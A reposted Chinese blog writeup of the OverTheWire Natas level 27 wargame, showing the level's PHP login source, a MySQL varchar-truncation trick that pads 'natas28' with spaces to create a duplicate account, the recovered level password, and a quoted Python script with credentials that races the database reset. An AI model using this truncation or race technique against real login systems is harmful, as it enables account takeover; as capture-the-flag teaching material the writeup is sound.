Natas Wargame Level27 Writeup(SQL表的注入/溢出与截取)

最新推荐文章于 2023-05-20 11:21:52 发布
最新推荐文章于 2023-05-20 11:21:52 发布
阅读量121 收藏
点赞数
文章标签: 数据库 前端 php ViewUI
原文链接:http://www.cnblogs.com/liqiuhao/p/6906474.html
版权


前端:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
</head>
<body>
<h1>natas27</h1>
<div id="content">

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password" type="password"><br>
<input type="submit" value="login" />
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

未启用会话/cookie

sourcecode:

<?

// morla / 10111
// database gets cleared every 5 min 


/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/


function checkCredentials($link,$usr,$pass){
 
    $user=mysql_real_escape_string($usr);
    $password=mysql_real_escape_string($pass);
    
    $query = "SELECT username from users where username='$user' and password='$password' ";
    SELECT username from users where username='natas28' and password='' 
    $res = mysql_query($query, $link);
    if(mysql_num_rows($res) > 0){
        return True;
    }
    return False;
}


function validUser($link,$usr){
    
    $user=mysql_real_escape_string($usr);
    
    $query = "SELECT * from users where username='$user'";
    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            return True;
        }
    }
    return False;
}


function dumpData($link,$usr){
    
    $user=mysql_real_escape_string($usr);
    
    $query = "SELECT * from users where username='$user'";
    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            while ($row = mysql_fetch_assoc($res)) {
                // thanks to Gobo for reporting this bug!  
                //return print_r($row);
                return print_r($row,true);
            }
        }
    }
    return False;
}


function createUser($link, $usr, $pass){

    $user=mysql_real_escape_string($usr);
    $password=mysql_real_escape_string($pass);
    
    $query = "INSERT INTO users (username,password) values ('$user','$password')";
    $res = mysql_query($query, $link);
    if(mysql_affected_rows() > 0){
        return True;
    }
    return False;
}


if(array_key_exists("username", $_REQUEST) and array_key_exists("password", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas27', '<censored>');
    mysql_select_db('natas27', $link);
   

    if(validUser($link,$_REQUEST["username"])) {
        //user exists, check creds
        if(checkCredentials($link,$_REQUEST["username"],$_REQUEST["password"])){
            echo "Welcome " . htmlentities($_REQUEST["username"]) . "!<br>";
            echo "Here is your data:<br>";
            $data=dumpData($link,$_REQUEST["username"]);
            print htmlentities($data);
        }
        else{
            echo "Wrong password for user: " . htmlentities($_REQUEST["username"]) . "<br>";
        }        
    } 
    else {
        //user doesn't exist
        if(createUser($link,$_REQUEST["username"],$_REQUEST["password"])){ 
            echo "User " . htmlentities($_REQUEST["username"]) . " was created!";
        }
    }

    mysql_close($link);
} else {
?>

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password" type="password"><br>
<input type="submit" value="login" />
</form>
<? } ?>

代码看起来存在很多注入点,但是都很难实现:一是通过了mysql-real-escape-string 转义,想要绕过的话也很困难:$password使用''括起来了,无法用like wildchar和number绕过(参见 )。

继续分析,总结流程如下:

Receive Input -> Check if user exist -> ifexist check credentials -> show data.

Receive Input -> check if user exist -> if dosen't -> create user.

同时,验证用户名/密码是否正确也仅仅是看返回数组是否>0

很容易联想到,如果我们插入一个和目标账目相同的行,即使我们不知道密码,function checkCredentials($link,$usr,$pass)的查找结果数组也会>0并返回true,接着function dumpData($link,$usr)就可能回显真正的用户与密码了。(注意这里只会回显一行,虽然dumpData里面是个while循环,但里层直接return print_r($row,true)了)

插入要实现两点:

  1. function validUser($link,$usr)查找不到用户。
  2. 存储后的username要和目标username相同,密码自己定。

这里还要参考两个mysql里面的知识点

  1. 字符串存储时若发生“溢出”,mysql会自动truncate到最大宽度。
  2. 空格在varchar里面会被自动删除。

所以,正确的插入可以是这样“natas28+连续空格(此处超过64字节)+xxx”,密码随意,可以为空。(注意,后面的xxx是必须的,因为在mysql中'natas28'='natas28+空格'),比较username时mysql并不会对提交的username进行truncate,所以判断用户名不存在,开始新建用户名和密码。一旦开始存储,就会发生溢出/截取,导致出现两个username同为‘natas28’的行。接着返回登录界面,输入natas28+密码。找寻操作会返回刚刚插入的数组(>0),所以查询成功,回显用户名和秘钥,这时回显的就是第一个nata28那行,即我们要获得的flag。

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
</head>
<body>
<h1>natas27</h1>
<div id="content">
Welcome natas28                                !<br>Here is your data:<br>Array
(
    [username] =&gt; natas28
    [password] =&gt; JWwR438wkgTsNKBbcJoowyysdM82YjeF
)
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

突然发现有一个利用开头“5分钟重置”来进行注入的例子,思路是一样的,实现方法不一样(即重置后先于正常的NATAs28注入进去):
From:http://www.voidcn.com/blog/lyover/article/p-4915422.html

import requests
data={'username':'natas28','password':''}
auth=requests.auth.HTTPBasicAuth('natas27','55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ')
while 1:
    re=requests.post("http://natas27.natas.labs.overthewire.org",auth=auth,data=data)
    if 'Wrong password' not in re.text:
        print(re.text)
        break

转载于:https://www.cnblogs.com/liqiuhao/p/6906474.html

a_18067
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
4. **编码与解码**:JavaScript内置了多种编码和解码函数,如`atob()`和`btoa()`用于Base64编码解码,Natas中常利用这些函数隐藏或混淆密码。 三、解决Natas问题的关键步骤 1. **理解HTML和HTTP**:首先,玩家需要...
Overthewire natas27 最新解法2023版本
mengzh620的博客
04-24 301
import reoutput:Array。
mysql溢出漏洞_Natas27 Writeup(mysql溢出截断漏洞)
weixin_39792393的博客
01-28 106
Natas27: 一个登录节界面,查看源码。 varwechallinfo={"level":"natas27","pass":""};natas27// morla / 10111// database gets cleared every 5 min/*CREATE TABLE `users` (`username` varchar(64) DEFAULT NULL,`password` v...
natas27题解(终章)
lyover的博客
12-08 1024
可以输入账号密码 先尝试用natas28登录,提示密码错误,也就是说,这个账号是写在数据库里的,并且密码就是我们想要的 // database gets cleared every 5 min 每五分钟重置数据库,如果一直提交natas28密码为空(或者随便,但是要写在post的参数里),恰好等到重置那个的时刻,库里就会有两个natas,在调用checkCredentials函数的时
网络空间安全——Wargame靶场(Natas)
最新发布
weixin_44717952的博客
05-20 1174
访问的网站才能看到密码”,在 http 的 refer 字段中明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
natas(level26-level34)通关(三)
tempulcc的博客
10-13 403
@[TOC](natas(level26-level34)通关详细指南(三) level26 URL:http://natas26.natas.labs.overthewire.org Username: natas26 Password: oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
natas
02-23
标题 "natas" 提供的信息明这是一个与网络通信和数据包监听有关的程序,可能用于网络安全分析或教学目的。在Windows 2000操作系统环境下,它利用原始套接字(raw socket)来捕获和解析IP数据包。在IT领域,原始套...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
Natas 幽灵王病毒的分析》
03-26
Natas 幽灵王病毒的分析》 很厉害的一个病毒分析案例
Natas-Solutions:试图解决纳塔斯问题
03-31
SQL注入Natas中常见的攻击手段。理解如何通过输入恶意数据影响后端数据库查询,从而获取敏感信息,是解决此类问题的核心。 6. **命令注入**: 当Web应用没有正确过滤用户输入时,可能导致命令注入。通过构造...
natas(21-27
半夜好饿的博客
08-19 443
natas21: 本关有两个页面,一个和之前的相同,显示“You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.”,另一个好像是一个修改CSS的页面,查看第一个页面的源码,会发现和前一关相似,都是需要_SESSION[“admin”]==1才可看到下一级的密码。 加上第...
OverTheWire的natas游戏(21-34)
qq_40710190的博客
07-18 681
natas solution(21-34) Natas Level 20 → Level 21 Username: natas21 URL: http://natas21.natas.labs.overthewire.org 这一关涉及到一个共享session的知识点,算是本关的收获吧。 进入页面后看到提示 Note: this website is colocated with http://natas21-experimenter.natas.labs.overthewire.org 在看
natas通关记录
weixin_42728957的博客
12-10 2510
OverTheWire 是一个 wargame 网站。其中 Natas 是一个适合学习Web安全基础的游戏,在Natas 中,我们需要通过找到网站的漏洞获得通往下一关的密码。每一关都有一个网站,类似 http://natasX.natas.labs.overthewire.org,其中X是每一关的编号。每一关都要输入用户名(例如,level0的用户名是natas0)及其密码才能访问。所有密码存储在...
170822 WarGames-Natas(27-28)
whklhhhh的博客
08-22 727
1625-5 王子昂 总结《2017年8月22日》 【连续第323天总结】 A. Natas B.Level 27按照之前sql注入的尿性,username应该是natas28,试一下回复Wrong password确认无误 本来以为是宽字节注入,绕过mysql_real_escape_string()函数 原理是该函数对单引号等字符自动进行转义,在前边添加’\’ 单引号字符为0x27
WarGames-Natas(16)
whklhhhh的博客
08-18 515
natas(16)<? $key = "";if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; }if($key != "") { if(preg_match('/[;|&`\'"]/',$key)) { print "Input contains an illegal cha
[SUCTF 2019]EasySQL 1 Writeup(超级详细)
热门推荐
StevenOnesir的博客
11-26 1万+
本文章是该系列的第三篇,同样涉及到基础sql注入原理。 首先我们能看到的就是一个输入框,直接告诉了你注入点。 做了一些简单的测试,直接过滤了from、union、extractvalue、PREPARE等关键字,回显提示:NONONO! 前面的那道sql我还是讲的比较中规中矩,这道sql骚一点。 先讲讲我的第一种玩法: 首先手工盲注嘛,会发现连sleep等都全部过滤掉了,而且你输入数字的时候回显是: Array ( [0] => 1 ) 输入字符的时候啥也不回显。 有经验的师傅这个时候其实就懂得要放
natas15 题解
lyover的博客
11-25 924
natas一系列是国外的web安全游戏,可以真正的帮你练习web渗透,不单单是依靠工具,这次要写的就是一个sql盲注的脚本,下边附上第一关的网址 http://overthewire.org/wargames/natas/natas0.html 前几关还都好过,到了后边越来越难,写题解的大多都是外国,国内能的搜到只有很少,而且看了国内某巨巨用linux写的各种题解,云里雾里,只好跑到国外看
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值